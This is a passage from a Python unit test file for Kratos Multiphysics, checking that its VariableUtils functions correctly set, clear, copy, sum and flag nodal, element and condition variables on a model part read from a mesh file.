self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.ORIENTATION).X, 1.0)
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.ORIENTATION).W, 4.0)
def test_set_nonhistorical_variable(self):
current_model = KratosMultiphysics.Model()
##set the model part
model_part = current_model.CreateModelPart("Main")
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.ORIENTATION)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(model_part)
##set the variable values
viscosity = 0.1
displacement = KratosMultiphysics.Vector(3)
displacement[0] = 1.0
displacement[1] = 2.0
displacement[2] = 3.0
orientation = KratosMultiphysics.Quaternion()
orientation.X = 1.0
orientation.Y = 2.0
orientation.Z = 3.0
orientation.W = 4.0
# First for nodes
KratosMultiphysics.VariableUtils().SetNonHistoricalVariable(KratosMultiphysics.VISCOSITY, viscosity, model_part.Nodes)
KratosMultiphysics.VariableUtils().SetNonHistoricalVariable(KratosMultiphysics.DISPLACEMENT, displacement, model_part.Nodes)
KratosMultiphysics.VariableUtils().SetNonHistoricalVariable(KratosMultiphysics.ORIENTATION, orientation, model_part.Nodes)
##verify the result
for node in model_part.Nodes:
self.assertEqual(node.GetValue(KratosMultiphysics.DISPLACEMENT_X), 1.0)
self.assertEqual(node.GetValue(KratosMultiphysics.DISPLACEMENT_Y), 2.0)
self.assertEqual(node.GetValue(KratosMultiphysics.DISPLACEMENT_Z), 3.0)
self.assertEqual(node.GetValue(KratosMultiphysics.VISCOSITY), viscosity)
self.assertEqual(node.GetValue(KratosMultiphysics.ORIENTATION).X, 1.0)
self.assertEqual(node.GetValue(KratosMultiphysics.ORIENTATION).W, 4.0)
# Now for conditions (it will work for elements too)
KratosMultiphysics.VariableUtils().SetNonHistoricalVariable(KratosMultiphysics.VISCOSITY, viscosity, model_part.Conditions)
KratosMultiphysics.VariableUtils().SetNonHistoricalVariable(KratosMultiphysics.DISPLACEMENT, displacement, model_part.Conditions)
##verify the result
for cond in model_part.Conditions:
disp = cond.GetValue(KratosMultiphysics.DISPLACEMENT)
self.assertEqual(disp[0], 1.0)
self.assertEqual(disp[1], 2.0)
self.assertEqual(disp[2], 3.0)
self.assertEqual(cond.GetValue(KratosMultiphysics.VISCOSITY), viscosity)
def test_clear_nonhistorical_values(self):
current_model = KratosMultiphysics.Model()
##set the model part
model_part = current_model.CreateModelPart("Main")
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(model_part)
##set the variable values
viscosity = 0.1
displacement = KratosMultiphysics.Vector(3)
displacement[0] = 1.0
displacement[1] = 2.0
displacement[2] = 3.0
# First for nodes
KratosMultiphysics.VariableUtils().SetNonHistoricalVariable(KratosMultiphysics.VISCOSITY, viscosity, model_part.Nodes)
KratosMultiphysics.VariableUtils().SetNonHistoricalVariable(KratosMultiphysics.DISPLACEMENT, displacement, model_part.Nodes)
KratosMultiphysics.VariableUtils().ClearNonHistoricalData(model_part.Nodes)
##verify the result
for node in model_part.Nodes:
self.assertFalse(node.Has(KratosMultiphysics.DISPLACEMENT))
self.assertFalse(node.Has(KratosMultiphysics.VISCOSITY))
# Now for conditions (it will work for elements too)
KratosMultiphysics.VariableUtils().SetNonHistoricalVariable(KratosMultiphysics.VISCOSITY, viscosity, model_part.Conditions)
KratosMultiphysics.VariableUtils().SetNonHistoricalVariable(KratosMultiphysics.DISPLACEMENT, displacement, model_part.Conditions)
KratosMultiphysics.VariableUtils().ClearNonHistoricalData(model_part.Conditions)
##verify the result
for cond in model_part.Conditions:
self.assertFalse(cond.Has(KratosMultiphysics.DISPLACEMENT))
self.assertFalse(cond.Has(KratosMultiphysics.VISCOSITY))
def test_set_flag(self):
current_model = KratosMultiphysics.Model()
##set the model part
model_part = current_model.CreateModelPart("Main")
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(model_part)
KratosMultiphysics.VariableUtils().SetFlag(KratosMultiphysics.VISITED, True, model_part.Nodes)
KratosMultiphysics.VariableUtils().SetFlag(KratosMultiphysics.VISITED, True, model_part.Conditions)
KratosMultiphysics.VariableUtils().SetFlag(KratosMultiphysics.VISITED, True, model_part.Elements)
KratosMultiphysics.VariableUtils().SetFlag(KratosMultiphysics.INLET, True, model_part.GetSubModelPart("Inlets").Nodes)
KratosMultiphysics.VariableUtils().SetFlag(KratosMultiphysics.INLET, True, model_part.GetSubModelPart("Inlets").Conditions)
KratosMultiphysics.VariableUtils().SetFlag(KratosMultiphysics.OUTLET, False, model_part.GetSubModelPart("Inlets").Nodes)
KratosMultiphysics.VariableUtils().SetFlag(KratosMultiphysics.OUTLET, False, model_part.GetSubModelPart("Inlets").Conditions)
##verify the main modelpart flags set
for node in model_part.Nodes:
self.assertTrue(node.Is(KratosMultiphysics.VISITED))
for condition in model_part.Conditions:
self.assertTrue(condition.Is(KratosMultiphysics.VISITED))
for element in model_part.Elements:
self.assertTrue(element.Is(KratosMultiphysics.VISITED))
##verify the inlet submodelpart flag set
for node in model_part.GetSubModelPart("Inlets").Nodes:
self.assertTrue(node.Is(KratosMultiphysics.INLET))
self.assertTrue(node.IsNot(KratosMultiphysics.OUTLET))
for condition in model_part.GetSubModelPart("Inlets").Conditions:
self.assertTrue(condition.Is(KratosMultiphysics.INLET))
self.assertTrue(condition.IsNot(KratosMultiphysics.OUTLET))
KratosMultiphysics.VariableUtils().FlipFlag(KratosMultiphysics.VISITED, model_part.Nodes)
KratosMultiphysics.VariableUtils().FlipFlag(KratosMultiphysics.VISITED, model_part.Conditions)
KratosMultiphysics.VariableUtils().FlipFlag(KratosMultiphysics.VISITED, model_part.Elements)
KratosMultiphysics.VariableUtils().FlipFlag(KratosMultiphysics.INLET, model_part.GetSubModelPart("Inlets").Nodes)
KratosMultiphysics.VariableUtils().FlipFlag(KratosMultiphysics.INLET, model_part.GetSubModelPart("Inlets").Conditions)
KratosMultiphysics.VariableUtils().FlipFlag(KratosMultiphysics.OUTLET, model_part.GetSubModelPart("Inlets").Nodes)
KratosMultiphysics.VariableUtils().FlipFlag(KratosMultiphysics.OUTLET, model_part.GetSubModelPart("Inlets").Conditions)
##verify the main modelpart flags set
for node in model_part.Nodes:
self.assertFalse(node.Is(KratosMultiphysics.VISITED))
for condition in model_part.Conditions:
self.assertFalse(condition.Is(KratosMultiphysics.VISITED))
for element in model_part.Elements:
self.assertFalse(element.Is(KratosMultiphysics.VISITED))
##verify the inlet submodelpart flag set
for node in model_part.GetSubModelPart("Inlets").Nodes:
self.assertFalse(node.Is(KratosMultiphysics.INLET))
self.assertFalse(node.IsNot(KratosMultiphysics.OUTLET))
for condition in model_part.GetSubModelPart("Inlets").Conditions:
self.assertFalse(condition.Is(KratosMultiphysics.INLET))
self.assertFalse(condition.IsNot(KratosMultiphysics.OUTLET))
KratosMultiphysics.VariableUtils().ResetFlag(KratosMultiphysics.VISITED, model_part.Nodes)
KratosMultiphysics.VariableUtils().ResetFlag(KratosMultiphysics.VISITED, model_part.Conditions)
KratosMultiphysics.VariableUtils().ResetFlag(KratosMultiphysics.VISITED, model_part.Elements)
KratosMultiphysics.VariableUtils().ResetFlag(KratosMultiphysics.INLET, model_part.GetSubModelPart("Inlets").Nodes)
KratosMultiphysics.VariableUtils().ResetFlag(KratosMultiphysics.INLET, model_part.GetSubModelPart("Inlets").Conditions)
KratosMultiphysics.VariableUtils().ResetFlag(KratosMultiphysics.OUTLET, model_part.GetSubModelPart("Inlets").Nodes)
KratosMultiphysics.VariableUtils().ResetFlag(KratosMultiphysics.OUTLET, model_part.GetSubModelPart("Inlets").Conditions)
##verify the main modelpart flags unset
for node in model_part.Nodes:
self.assertFalse(node.IsDefined(KratosMultiphysics.VISITED))
for condition in model_part.Conditions:
self.assertFalse(condition.IsDefined(KratosMultiphysics.VISITED))
for element in model_part.Elements:
self.assertFalse(element.IsDefined(KratosMultiphysics.VISITED))
##verify the inlet submodelpart flag set
for node in model_part.GetSubModelPart("Inlets").Nodes:
self.assertFalse(node.IsDefined(KratosMultiphysics.INLET))
self.assertFalse(node.IsDefined(KratosMultiphysics.OUTLET))
for condition in model_part.GetSubModelPart("Inlets").Conditions:
self.assertFalse(condition.IsDefined(KratosMultiphysics.INLET))
self.assertFalse(condition.IsDefined(KratosMultiphysics.OUTLET))
def test_copy_var(self):
current_model = KratosMultiphysics.Model()
##set the model part
model_part = current_model.CreateModelPart("Main")
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DENSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VELOCITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.FORCE)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.REACTION)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(model_part)
##set the variable values
viscosity = 0.1
displacement = KratosMultiphysics.Vector(3)
displacement[0] = 1.3
displacement[1] = 2.2
displacement[2] = 3.1
KratosMultiphysics.VariableUtils().SetVariable(KratosMultiphysics.VISCOSITY, viscosity, model_part.Nodes)
KratosMultiphysics.VariableUtils().SetVariable(KratosMultiphysics.DISPLACEMENT, displacement, model_part.Nodes)
KratosMultiphysics.VariableUtils().SetVariable(KratosMultiphysics.FORCE, displacement, model_part.Nodes)
##save the variable values
KratosMultiphysics.VariableUtils().CopyScalarVar(KratosMultiphysics.VISCOSITY, KratosMultiphysics.DENSITY, model_part.Nodes)
KratosMultiphysics.VariableUtils().CopyScalarVar(KratosMultiphysics.FORCE_X, KratosMultiphysics.REACTION_Y, model_part.Nodes)
KratosMultiphysics.VariableUtils().CopyScalarVar(KratosMultiphysics.FORCE_X, KratosMultiphysics.FORCE_Y, model_part.Nodes)
KratosMultiphysics.VariableUtils().CopyVectorVar(KratosMultiphysics.DISPLACEMENT, KratosMultiphysics.VELOCITY, model_part.Nodes)
##verify the result
for node in model_part.Nodes:
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_X), node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_X))
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_Y), node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y))
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_Z), node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Z))
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.FORCE_X), node.GetSolutionStepValue(KratosMultiphysics.REACTION_Y))
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.FORCE_X), node.GetSolutionStepValue(KratosMultiphysics.FORCE_Y))
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.VISCOSITY), node.GetSolutionStepValue(KratosMultiphysics.DENSITY))
def test_save_var(self):
current_model = KratosMultiphysics.Model()
##set the model part
model_part = current_model.CreateModelPart("Main")
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DENSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VELOCITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(model_part)
##save the variable values
KratosMultiphysics.VariableUtils().SaveScalarVar(KratosMultiphysics.VISCOSITY, KratosMultiphysics.DENSITY, model_part.Nodes)
KratosMultiphysics.VariableUtils().SaveVectorVar(KratosMultiphysics.DISPLACEMENT, KratosMultiphysics.VELOCITY, model_part.Nodes)
KratosMultiphysics.VariableUtils().SaveScalarNonHistoricalVar(KratosMultiphysics.DENSITY, KratosMultiphysics.DISTANCE, model_part.Nodes)
KratosMultiphysics.VariableUtils().SaveVectorNonHistoricalVar(KratosMultiphysics.VELOCITY, KratosMultiphysics.VOLUME_ACCELERATION, model_part.Nodes)
##verify the result
for node in model_part.Nodes:
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_X), node.GetValue(KratosMultiphysics.VELOCITY_X))
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_Y), node.GetValue(KratosMultiphysics.VELOCITY_Y))
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_Z), node.GetValue(KratosMultiphysics.VELOCITY_Z))
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.VISCOSITY), node.GetValue(KratosMultiphysics.DENSITY))
self.assertEqual(node.GetValue(KratosMultiphysics.VOLUME_ACCELERATION_X), node.GetValue(KratosMultiphysics.VELOCITY_X))
self.assertEqual(node.GetValue(KratosMultiphysics.VOLUME_ACCELERATION_Y), node.GetValue(KratosMultiphysics.VELOCITY_Y))
self.assertEqual(node.GetValue(KratosMultiphysics.VOLUME_ACCELERATION_Z), node.GetValue(KratosMultiphysics.VELOCITY_Z))
self.assertEqual(node.GetValue(KratosMultiphysics.DISTANCE), node.GetValue(KratosMultiphysics.DENSITY))
def test_set_variable_to_zero(self):
## Set the model part
current_model = KratosMultiphysics.Model()
model_part = current_model.CreateModelPart("Main")
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(model_part)
## Initialize the variable values
for node in model_part.Elements:
node.SetValue(KratosMultiphysics.VISCOSITY, node.Id)
node.SetValue(KratosMultiphysics.DISPLACEMENT, [node.Id, 2 * node.Id, 3.0 * node.Id])
for elem in model_part.Elements:
elem.SetValue(KratosMultiphysics.VISCOSITY, elem.Id)
elem.SetValue(KratosMultiphysics.DISPLACEMENT, [elem.Id, 2 * elem.Id, 3.0 * elem.Id])
for cond in model_part.Conditions:
cond.SetValue(KratosMultiphysics.VISCOSITY, cond.Id)
cond.SetValue(KratosMultiphysics.DISPLACEMENT, [cond.Id, 2 * cond.Id, 3.0 * cond.Id])
## Set the variable values to zero
KratosMultiphysics.VariableUtils().SetNonHistoricalVariableToZero(KratosMultiphysics.VISCOSITY, model_part.Nodes)
KratosMultiphysics.VariableUtils().SetNonHistoricalVariableToZero(KratosMultiphysics.VISCOSITY, model_part.Elements)
KratosMultiphysics.VariableUtils().SetNonHistoricalVariableToZero(KratosMultiphysics.VISCOSITY, model_part.Conditions)
KratosMultiphysics.VariableUtils().SetNonHistoricalVariableToZero(KratosMultiphysics.DISPLACEMENT, model_part.Nodes)
KratosMultiphysics.VariableUtils().SetNonHistoricalVariableToZero(KratosMultiphysics.DISPLACEMENT, model_part.Elements)
KratosMultiphysics.VariableUtils().SetNonHistoricalVariableToZero(KratosMultiphysics.DISPLACEMENT, model_part.Conditions)
## Verify the results
for node in model_part.Nodes:
self.assertEqual(node.GetValue(KratosMultiphysics.VISCOSITY), 0.0)
aux = node.GetValue(KratosMultiphysics.DISPLACEMENT)
self.assertEqual(aux[0], 0.0)
self.assertEqual(aux[1], 0.0)
self.assertEqual(aux[2], 0.0)
for elem in model_part.Elements:
self.assertEqual(elem.GetValue(KratosMultiphysics.VISCOSITY), 0.0)
aux = elem.GetValue(KratosMultiphysics.DISPLACEMENT)
self.assertEqual(aux[0], 0.0)
self.assertEqual(aux[1], 0.0)
self.assertEqual(aux[2], 0.0)
for cond in model_part.Conditions:
self.assertEqual(cond.GetValue(KratosMultiphysics.VISCOSITY), 0.0)
aux = cond.GetValue(KratosMultiphysics.DISPLACEMENT)
self.assertEqual(aux[0], 0.0)
self.assertEqual(aux[1], 0.0)
self.assertEqual(aux[2], 0.0)
def test_set_nodal_historical_variable_to_zero(self):
## Set the model part
current_model = KratosMultiphysics.Model()
model_part = current_model.CreateModelPart("Main")
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(model_part)
## Initialize the variable values
for node in model_part.Nodes:
node.SetSolutionStepValue(KratosMultiphysics.VISCOSITY, node.Id)
node.SetSolutionStepValue(KratosMultiphysics.DISPLACEMENT, [node.Id, 2.0 * node.Id, 3.0 * node.Id])
## Set the variable values to zero
KratosMultiphysics.VariableUtils().SetHistoricalVariableToZero(KratosMultiphysics.VISCOSITY, model_part.Nodes)
KratosMultiphysics.VariableUtils().SetHistoricalVariableToZero(KratosMultiphysics.DISPLACEMENT, model_part.Nodes)
## Verify the result
for node in model_part.Nodes:
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.VISCOSITY), 0.0)
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_X), 0.0)
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_Y), 0.0)
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_Z), 0.0)
def test_select_node_list(self):
current_model = KratosMultiphysics.Model()
##set the model part
model_part = current_model.CreateModelPart("Main")
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(model_part)
##extract the nodes with KratosMultiphysics.DISPLACEMENT_X equal to 0.0
ids_list = []
node_list = KratosMultiphysics.VariableUtils().SelectNodeList(KratosMultiphysics.VISCOSITY, 0.01, model_part.Nodes)
for node in node_list:
ids_list.append(node.Id)
##verify the result
self.assertTrue(model_part.Nodes[1].Id in ids_list)
self.assertTrue(model_part.Nodes[2].Id in ids_list)
self.assertTrue(model_part.Nodes[973].Id in ids_list)
self.assertTrue(model_part.Nodes[974].Id in ids_list)
def test_apply_fixity(self):
current_model = KratosMultiphysics.Model()
##set the model part
model_part = current_model.CreateModelPart("Main")
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.VISCOSITY, model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.DISPLACEMENT_X, model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.DISPLACEMENT_Y, model_part)
##apply the fixity
KratosMultiphysics.VariableUtils().ApplyFixity(KratosMultiphysics.VISCOSITY, True, model_part.Nodes)
KratosMultiphysics.VariableUtils().ApplyFixity(KratosMultiphysics.DISPLACEMENT_X, True, model_part.Nodes)
KratosMultiphysics.VariableUtils().ApplyFixity(KratosMultiphysics.DISPLACEMENT_Y, False, model_part.Nodes)
##verify the result
for node in model_part.Nodes:
self.assertTrue(node.IsFixed(KratosMultiphysics.VISCOSITY))
self.assertTrue(node.IsFixed(KratosMultiphysics.DISPLACEMENT_X))
self.assertFalse(node.IsFixed(KratosMultiphysics.DISPLACEMENT_Y))
def test_apply_vector(self):
current_model = KratosMultiphysics.Model()
##set the model part
model_part = current_model.CreateModelPart("Main")
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(model_part)
##set the data vector [0,1,2,...]
data_vector_x1 = KratosMultiphysics.Vector(len(model_part.Nodes))
data_vector_x2 = KratosMultiphysics.Vector(len(model_part.Nodes))
for i in range(len(model_part.Nodes)):
data_vector_x1[i] = i
data_vector_x2[i] = 2.0*i
KratosMultiphysics.VariableUtils().ApplyVector(KratosMultiphysics.VISCOSITY, data_vector_x1, model_part.Nodes)
KratosMultiphysics.VariableUtils().ApplyVector(KratosMultiphysics.DISPLACEMENT_X, data_vector_x2, model_part.Nodes)
##verify the result
i = 0
for node in model_part.Nodes:
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.VISCOSITY), data_vector_x1[i])
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_X), data_vector_x2[i])
i+=1
def test_sum_variable(self):
current_model = KratosMultiphysics.Model()
##set the model part
model_part = current_model.CreateModelPart("Main")
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DENSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VELOCITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(model_part)
scalar_val = 0.1
vector_val = KratosMultiphysics.Vector(3)
vector_val[0] = 1.0
vector_val[1] = 2.0
vector_val[2] = 3.0
##set non-historical nodal values (historical ones coming from the mdpa)
for node in model_part.Nodes:
node.SetValue(KratosMultiphysics.DENSITY, scalar_val)
node.SetValue(KratosMultiphysics.VELOCITY, vector_val)
##set non-historical condition values
for condition in model_part.Conditions:
condition.SetValue(KratosMultiphysics.DENSITY, scalar_val)
condition.SetValue(KratosMultiphysics.VELOCITY, vector_val)
##set non-historical element values
for element in model_part.Elements:
element.SetValue(KratosMultiphysics.DENSITY, scalar_val)
element.SetValue(KratosMultiphysics.VELOCITY, vector_val)
##sum nodal variables
sum_hist_scal = KratosMultiphysics.VariableUtils().SumHistoricalNodeScalarVariable(KratosMultiphysics.VISCOSITY, model_part, 0)
sum_hist_vect = KratosMultiphysics.VariableUtils().SumHistoricalNodeVectorVariable(KratosMultiphysics.DISPLACEMENT, model_part, 0)
sum_nonhist_scal = KratosMultiphysics.VariableUtils().SumNonHistoricalNodeScalarVariable(KratosMultiphysics.DENSITY, model_part)
sum_nonhist_vect = KratosMultiphysics.VariableUtils().SumNonHistoricalNodeVectorVariable(KratosMultiphysics.VELOCITY, model_part)
##verify the nodal results
self.assertAlmostEqual(sum_hist_scal, 0.04, delta=1e-6)
self.assertAlmostEqual(sum_hist_vect[0], 0.3, delta=1e-6)
self.assertAlmostEqual(sum_hist_vect[1], 0.001947, delta=1e-6)
self.assertAlmostEqual(sum_hist_vect[2], 0.0, delta=1e-6)
self.assertAlmostEqual(sum_nonhist_scal, 0.6, delta=1e-6)
self.assertAlmostEqual(sum_nonhist_vect[0], 6.0, delta=1e-6)
self.assertAlmostEqual(sum_nonhist_vect[1], 12.0, delta=1e-6)
self.assertAlmostEqual(sum_nonhist_vect[2], 18.0, delta=1e-6)
##sum condition variables
cond_scal = KratosMultiphysics.VariableUtils().SumConditionScalarVariable(KratosMultiphysics.DENSITY, model_part)
cond_vect = KratosMultiphysics.VariableUtils().SumConditionVectorVariable(KratosMultiphysics.VELOCITY, model_part)
##verify the condition results
self.assertAlmostEqual(cond_scal, 0.5, delta=1e-6)
self.assertAlmostEqual(cond_vect[0], 5.0, delta=1e-6)
self.assertAlmostEqual(cond_vect[1], 10.0, delta=1e-6)
self.assertAlmostEqual(cond_vect[2], 15.0, delta=1e-6)
##sum element variables
elem_scal = KratosMultiphysics.VariableUtils().SumElementScalarVariable(KratosMultiphysics.DENSITY, model_part)
elem_vect = KratosMultiphysics.VariableUtils().SumElementVectorVariable(KratosMultiphysics.VELOCITY, model_part)
##verify the element results
self.assertAlmostEqual(elem_scal, 0.4, delta=1e-6)
self.assertAlmostEqual(elem_vect[0], 4.0, delta=1e-6)
self.assertAlmostEqual(elem_vect[1], 8.0, delta=1e-6)
self.assertAlmostEqual(elem_vect[2], 12.0, delta=1e-6)
def test_UpdateCurrentToInitialConfiguration(self):
current_model = KratosMultiphysics.Model()
##set the model part
model_part = current_model.CreateModelPart("Main")
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DENSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VELOCITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(model_part)
##set the reference model part
ref_model_part = current_model.CreateModelPart("Reference")
ref_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DENSITY)
ref_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VELOCITY)
ref_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
ref_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
ref_model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
ref_model_part_io.ReadModelPart(ref_model_part)
dx = 0.1
dy = -0.2
dz = 0.3
# update the current configuration, ONLY in master_mp, NOT in the reference
for node in model_part.Nodes:
node.X += dx
node.Y += dy
node.Z += dz
KratosMultiphysics.VariableUtils().UpdateCurrentToInitialConfiguration(model_part.Nodes)
# we set the updated configuration back to the initial configuration
# therefore testing against the initial configuration of the reference MP
for node, node_ref in zip(model_part.Nodes, ref_model_part.Nodes):
self.assertAlmostEqual(node.X0, node_ref.X0)
self.assertAlmostEqual(node.Y0, node_ref.Y0)
self.assertAlmostEqual(node.Z0, node_ref.Z0)
self.assertAlmostEqual(node.X, node_ref.X0)
self.assertAlmostEqual(node.Y, node_ref.Y0)
self.assertAlmostEqual(node.Z, node_ref.Z0)
def test_UpdateInitialToCurrentConfiguration(self):
current_model = KratosMultiphysics.Model()
##set the model part
model_part = current_model.CreateModelPart("Main")
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DENSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VELOCITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(model_part)
##set the reference model part
ref_model_part = current_model.CreateModelPart("Reference")
ref_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DENSITY)
ref_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VELOCITY)
ref_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
ref_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
ref_model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
ref_model_part_io.ReadModelPart(ref_model_part)
dx = 0.1
dy = -0.2
dz = 0.3
# update the current configuration, in BOTH ModelParts!
for node, node_ref in zip(model_part.Nodes, ref_model_part.Nodes):
node.X += dx
node.Y += dy
node.Z += dz
node_ref.X += dx
node_ref.Y += dy
node_ref.Z += dz
KratosMultiphysics.VariableUtils().UpdateInitialToCurrentConfiguration(model_part.Nodes)
# we set the initial configuration to be the same as the current configuration
# therefore testing against the current configuration of the reference MP
for node, node_ref in zip(model_part.Nodes, ref_model_part.Nodes):
self.assertAlmostEqual(node.X0, node_ref.X)
self.assertAlmostEqual(node.Y0, node_ref.Y)
self.assertAlmostEqual(node.Z0, node_ref.Z)
self.assertAlmostEqual(node.X, node_ref.X)
self.assertAlmostEqual(node.Y, node_ref.Y)
self.assertAlmostEqual(node.Z, node_ref.Z)
def test_UpdateCurrentPosition(self):
# Set the test model part
current_model = KratosMultiphysics.Model()
model_part = current_model.CreateModelPart("Main")
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DENSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.MESH_DISPLACEMENT)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(model_part)
# Set a fake displacement field
for node in model_part.Nodes:
aux_disp = KratosMultiphysics.Vector(3)
aux_disp[0] = float(node.Id)
aux_disp[1] = 1.5 * float(node.Id)
aux_disp[2] = 2.0 * float(node.Id)
node.SetSolutionStepValue(KratosMultiphysics.DISPLACEMENT, aux_disp)
